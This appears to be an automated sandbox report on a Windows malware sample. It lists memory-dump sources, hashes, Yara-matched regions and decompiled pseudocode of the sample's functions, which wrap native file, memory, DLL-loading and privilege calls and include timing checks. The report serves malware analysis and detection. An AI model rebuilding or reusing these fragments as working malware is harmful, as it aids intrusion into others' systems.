                                                    • Opcode ID: 964fabb29755e57bdf1c1b3067120359e4dab18dfea8299925a258ae3a69b2b5
                                                    • Instruction ID: 87774222b7f21b0ba7fc6515ccfd3e0d2c1e45a4d167acc7d407a172bdaf4794
                                                    • Opcode Fuzzy Hash: 964fabb29755e57bdf1c1b3067120359e4dab18dfea8299925a258ae3a69b2b5
                                                    • Instruction Fuzzy Hash: B241C0B1D003099FDB14CF99D895ADEBBB5FF48314F24852AE819AB311D774A885CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 009D5421
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 31aeea81c80b688b17381c064559ce770b1598f607f503d60ab835fee973dd5d
                                                    • Instruction ID: 6419752ef195d9cd5f3e7566f32d7697dad5580368f88a33753c7b1242e17eae
                                                    • Opcode Fuzzy Hash: 31aeea81c80b688b17381c064559ce770b1598f607f503d60ab835fee973dd5d
                                                    • Instruction Fuzzy Hash: E8413470C00658CFDB20CFA9C884BDDBBB5BF49308F24846AD418BB261DB712986CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 009D5421
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 7e9aa0f33be94782011c359dad2a7b91c57e3f7931e2518e5322aee5858a92a1
                                                    • Instruction ID: 484b163f937cd0394dc87395c3fa4332aad55d90c59f8bcc91ad4fccf364846a
                                                    • Opcode Fuzzy Hash: 7e9aa0f33be94782011c359dad2a7b91c57e3f7931e2518e5322aee5858a92a1
                                                    • Instruction Fuzzy Hash: 0D41E370C00618CFDB24DFA9C884BCEBBB5BF58309F24846AD419BB251DBB56985CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009DBDE7
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: dbc7ff20778923995d6c784c8adb7d49c4a3330396fea94289430e4e56f75e31
                                                    • Instruction ID: 1e7a4e0d7f5dfa62a7989e2c50d77cfea0af4bafe7ec8788f93c0e8e80849fd8
                                                    • Opcode Fuzzy Hash: dbc7ff20778923995d6c784c8adb7d49c4a3330396fea94289430e4e56f75e31
                                                    • Instruction Fuzzy Hash: AD21E2B5900248DFDB10CFAAD884ADEBBF8EB48320F14841AE914A3350D378A954CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009D9709,00000800,00000000,00000000), ref: 009D991A
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 696f5668053dea72c25b694c15be031aedc5f7eb920d369790fb081e2373340b
                                                    • Instruction ID: 4240c27af9c3ed7accc8bcb382ddfa108ee57542e822f3778af7a40675990141
                                                    • Opcode Fuzzy Hash: 696f5668053dea72c25b694c15be031aedc5f7eb920d369790fb081e2373340b
                                                    • Instruction Fuzzy Hash: AB1103B69002489FDB10DF9AC444ADEFBF8EB89724F14842AD815B7300D374A955CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009D9709,00000800,00000000,00000000), ref: 009D991A
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 58ac8a85dfe238de81080ed4b21647c96f05732e9a0cf13979d6d0068318c3bd
                                                    • Instruction ID: f7f6d239456510c3883205d4e4b395b7d0929e9f4b681778d542aed14e457c9e
                                                    • Opcode Fuzzy Hash: 58ac8a85dfe238de81080ed4b21647c96f05732e9a0cf13979d6d0068318c3bd
                                                    • Instruction Fuzzy Hash: 3B1106B6D002498FCB10CFAAD444ADEFBF4EB49324F14852AD455B7200C775A945CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 009D968E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 34683179391f0254e9684c1da3e7fb03455298ab80ba88a546b37905f8b660ef
                                                    • Instruction ID: 36bdc26cea716ceebf8badd47b1e2cd7a24c91afb9dba7891ecef3b651dbb6f5
                                                    • Opcode Fuzzy Hash: 34683179391f0254e9684c1da3e7fb03455298ab80ba88a546b37905f8b660ef
                                                    • Instruction Fuzzy Hash: F711DFB5C006498FDB10DF9AD444ADEFBF8EB88324F14852AD819B7700D379A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Executed Functions

                                                    C-Code - Quality: 37%
                                                    			E0041867C(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                    				void* _t18;
                                                    				void* _t28;
                                                    				void* _t29;
                                                    				intOrPtr* _t30;
                                                    				void* _t32;
                                                    
                                                    				_t13 = _a4;
                                                    				_t30 = _a4 + 0xc48;
                                                    				E004191D0(_t28, _t13, _t30,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                    				_t4 =  &_a40; // 0x413a21
                                                    				_t6 =  &_a32; // 0x413d62
                                                    				_t12 =  &_a8; // 0x413d62
                                                    				_t18 =  *((intOrPtr*)( *_t30))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t29, _t32); // executed
                                                    				return _t18;
                                                    			}









                                                    APIs
                                                    • NtReadFile.NTDLL(b=A,5E972F61,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F61,00413D62,?,00000000), ref: 004186C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: !:A$b=A$b=A
                                                    • API String ID: 2738559852-704622139
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 37%
                                                    			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                    				void* _t18;
                                                    				void* _t27;
                                                    				intOrPtr* _t28;
                                                    
                                                    				_t13 = _a4;
                                                    				_t28 = _a4 + 0xc48;
                                                    				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                    				_t4 =  &_a40; // 0x413a21
                                                    				_t6 =  &_a32; // 0x413d62
                                                    				_t12 =  &_a8; // 0x413d62
                                                    				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                    				return _t18;
                                                    			}







                                                    APIs
                                                    • NtReadFile.NTDLL(b=A,5E972F61,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F61,00413D62,?,00000000), ref: 004186C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: !:A$b=A$b=A
                                                    • API String ID: 2738559852-704622139
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
                                                    				char* _v8;
                                                    				struct _EXCEPTION_RECORD _v12;
                                                    				struct _OBJDIR_INFORMATION _v16;
                                                    				char _v536;
                                                    				void* _t15;
                                                    				struct _OBJDIR_INFORMATION _t17;
                                                    				struct _OBJDIR_INFORMATION _t18;
                                                    				void* _t30;
                                                    				void* _t31;
                                                    				void* _t32;
                                                    
                                                    				_v8 =  &_v536;
                                                    				_t15 = E0041AF60( &_v12, 0x104, _a8);
                                                    				_t31 = _t30 + 0xc;
                                                    				if(_t15 != 0) {
                                                    					_t17 = E0041B380(__eflags, _v8);
                                                    					_t32 = _t31 + 4;
                                                    					__eflags = _t17;
                                                    					if(_t17 != 0) {
                                                    						E0041B600( &_v12, 0);
                                                    						_t32 = _t32 + 8;
                                                    					}
                                                    					_t18 = E00419710(_v8);
                                                    					_v16 = _t18;
                                                    					__eflags = _t18;
                                                    					if(_t18 == 0) {
                                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                    						return _v16;
                                                    					}
                                                    					return _t18;
                                                    				} else {
                                                    					return _t15;
                                                    				}
                                                    			}














                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E004185CA(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                    				long _t24;
                                                    				void* _t34;
                                                    
                                                    				asm("out 0x55, eax");
                                                    				_t18 = _a4;
                                                    				_t5 = _t18 + 0xc40; // 0xc40
                                                    				E004191D0(_t34, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                    				_t24 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                    				return _t24;
                                                    			}






                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                    				long _t21;
                                                    				void* _t31;
                                                    
                                                    				_t3 = _a4 + 0xc40; // 0xc40
                                                    				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                    				return _t21;
                                                    			}






                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E004187AC(void* __ecx, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
                                                    				intOrPtr _v0;
                                                    				long _t14;
                                                    				void* _t23;
                                                    
                                                    				_push(0xec8b5510);
                                                    				_t10 = _v0;
                                                    				_t3 = _t10 + 0xc60; // 0xca0
                                                    				E004191D0(_t23, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
                                                    				_t14 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                    				return _t14;
                                                    			}







                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                    				long _t14;
                                                    				void* _t21;
                                                    
                                                    				_t3 = _a4 + 0xc60; // 0xca0
                                                    				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                    				return _t14;
                                                    			}






                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004186FB(void* __eax, intOrPtr _a4, void* _a8) {
                                                    				long _t14;
                                                    				void* _t18;
                                                    
                                                    				_t11 = _a4;
                                                    				_t6 = _t11 + 0x10; // 0x300
                                                    				_t7 = _t11 + 0xc50; // 0x409753
                                                    				E004191D0(_t18, _a4, _t7,  *_t6, 0, 0x2c);
                                                    				_t14 = NtClose(_a8); // executed
                                                    				return _t14;
                                                    			}






                                                    APIs
                                                    • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00418700(intOrPtr _a4, void* _a8) {
                                                    				long _t8;
                                                    				void* _t11;
                                                    
                                                    				_t5 = _a4;
                                                    				_t2 = _t5 + 0x10; // 0x300
                                                    				_t3 = _t5 + 0xc50; // 0x409753
                                                    				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                    				_t8 = NtClose(_a8); // executed
                                                    				return _t8;
                                                    			}






                                                    APIs
                                                    • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 93%
                                                    			E004088C0(intOrPtr* _a4) {
                                                    				intOrPtr _v8;
                                                    				char _v24;
                                                    				char _v284;
                                                    				char _v804;
                                                    				char _v840;
                                                    				void* _t24;
                                                    				void* _t31;
                                                    				void* _t33;
                                                    				void* _t34;
                                                    				void* _t39;
                                                    				void* _t50;
                                                    				intOrPtr* _t52;
                                                    				void* _t53;
                                                    				void* _t54;
                                                    				void* _t55;
                                                    				void* _t56;
                                                    
                                                    				_t52 = _a4;
                                                    				_t39 = 0; // executed
                                                    				_t24 = E00406E10(_t52,  &_v24); // executed
                                                    				_t54 = _t53 + 8;
                                                    				if(_t24 != 0) {
                                                    					E00407020( &_v24,  &_v840);
                                                    					_t55 = _t54 + 8;
                                                    					do {
                                                    						E0041A0E0( &_v284, 0x104);
                                                    						E0041A750( &_v284,  &_v804);
                                                    						_t56 = _t55 + 0x10;
                                                    						_t50 = 0x4f;
                                                    						while(1) {
                                                    							_t31 = E00413DE0(E00413D80(_t52, _t50),  &_v284);
                                                    							_t56 = _t56 + 0x10;
                                                    							if(_t31 != 0) {
                                                    								break;
                                                    							}
                                                    							_t50 = _t50 + 1;
                                                    							if(_t50 <= 0x62) {
                                                    								continue;
                                                    							} else {
                                                    							}
                                                    							goto L8;
                                                    						}
                                                    						_t9 = _t52 + 0x14; // 0xffffe1a5
                                                    						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                    						_t39 = 1;
                                                    						L8:
                                                    						_t33 = E00407050( &_v24,  &_v840);
                                                    						_t55 = _t56 + 8;
                                                    					} while (_t33 != 0 && _t39 == 0);
                                                    					_t34 = E004070D0(_t52,  &_v24); // executed
                                                    					if(_t39 == 0) {
                                                    						asm("rdtsc");
                                                    						asm("rdtsc");
                                                    						_v8 = _t34 - 0 + _t34;
                                                    						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                    					}
                                                    					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                    					_t20 = _t52 + 0x31; // 0x5608758b
                                                    					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                    					return 1;
                                                    				} else {
                                                    					return _t24;
                                                    				}
                                                    			}




















                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                                    • Instruction ID: 8d10d9d25de9ec3e6def201a299ec9bf42c948c309616648182b8fd41abd7787
                                                    • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                                    • Instruction Fuzzy Hash: 54212BB2D442085BCB11E6609D42BFF736C9B54304F04017FE989A2181FA38AB498BA7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID: E|@D
                                                    • API String ID: 621844428-1370303659
                                                    • Opcode ID: 66a796d0ebfff3f9d5785c6ed58b8e05b27a6136a39288f6f4f9432df0981e0b
                                                    • Instruction ID: e895c59ff5785fe79b81943ebcb3a64fc83d15124883f7b35492da766616fb8c
                                                    • Opcode Fuzzy Hash: 66a796d0ebfff3f9d5785c6ed58b8e05b27a6136a39288f6f4f9432df0981e0b
                                                    • Instruction Fuzzy Hash: 2B11F5B6211208BBDB18DF99CC85EEB77A9AF8C754F158258FE4D97241C630E940CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                    				void* _t10;
                                                    				void* _t15;
                                                    
                                                    				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                    				_t6 =  &_a8; // 0x413526
                                                    				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                    				return _t10;
                                                    			}






                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID: &5A
                                                    • API String ID: 1279760036-1617645808
                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
                                                    				char _v67;
                                                    				char _v68;
                                                    				void* _t12;
                                                    				intOrPtr* _t13;
                                                    				int _t14;
                                                    				long _t21;
                                                    				intOrPtr* _t25;
                                                    				void* _t26;
                                                    				void* _t30;
                                                    
                                                    				_t30 = __eflags;
                                                    				_v68 = 0;
                                                    				E0041A130( &_v67, 0, 0x3f);
                                                    				E0041AD10( &_v68, 3);
                                                    				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
                                                    				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                    				_t25 = _t13;
                                                    				if(_t25 != 0) {
                                                    					_t21 = _a8;
                                                    					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                    					_t32 = _t14;
                                                    					if(_t14 == 0) {
                                                    						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                    					}
                                                    					return _t14;
                                                    				}
                                                    				return _t13;
                                                    			}













                                                    APIs
                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                    • Instruction ID: c56ba0c085939b8c42c795c32c14b578f190c8095243a7543fabada8e08a803b
                                                    • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                    • Instruction Fuzzy Hash: 13018431A8022877E720AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 65%
                                                    			E004188D2(void* __eax, unsigned int __ebx, signed int __ecx, void* __edi, void* _a4, long _a8, void* _a12) {
                                                    				intOrPtr _v0;
                                                    				intOrPtr _t10;
                                                    				char _t14;
                                                    				void* _t24;
                                                    
                                                    				_t24 = __edi + 0xffffffc6;
                                                    				_t10 = (__ebx >> __ecx) + 1;
                                                    				asm("lodsd");
                                                    				asm("rep lodsd");
                                                    				_push(_t10);
                                                    				 *0x8b55a8e4 = _t10;
                                                    				_t11 = _v0;
                                                    				_t4 = _t11 + 0xc74; // 0xc74
                                                    				E004191D0(_t24, _v0, _t4,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                                                    				_t14 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                                    				return _t14;
                                                    			}








                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: 67d82495b4063692c91892c48db61b0093108501fc37c852910822e860be5df8
                                                    • Instruction ID: d0155fad79ad0b948d62ddc79bec75bb1eaa1d629c12d81e7d1ba5b31236321b
                                                    • Opcode Fuzzy Hash: 67d82495b4063692c91892c48db61b0093108501fc37c852910822e860be5df8
                                                    • Instruction Fuzzy Hash: 86F0A9B1240604AFDB04CF28CC48EE737ADEF89320F144219B91ECB282C230E9018AB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                    				char _t10;
                                                    				void* _t15;
                                                    
                                                    				_t3 = _a4 + 0xc74; // 0xc74
                                                    				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                    				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                    				return _t10;
                                                    			}






                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                    				int _t10;
                                                    				void* _t15;
                                                    
                                                    				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                    				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                    				return _t10;
                                                    			}






                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00418920(intOrPtr _a4, int _a8) {
                                                    				void* _t10;
                                                    
                                                    				_t5 = _a4;
                                                    				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                    				ExitProcess(_a8);
                                                    			}





                                                    APIs
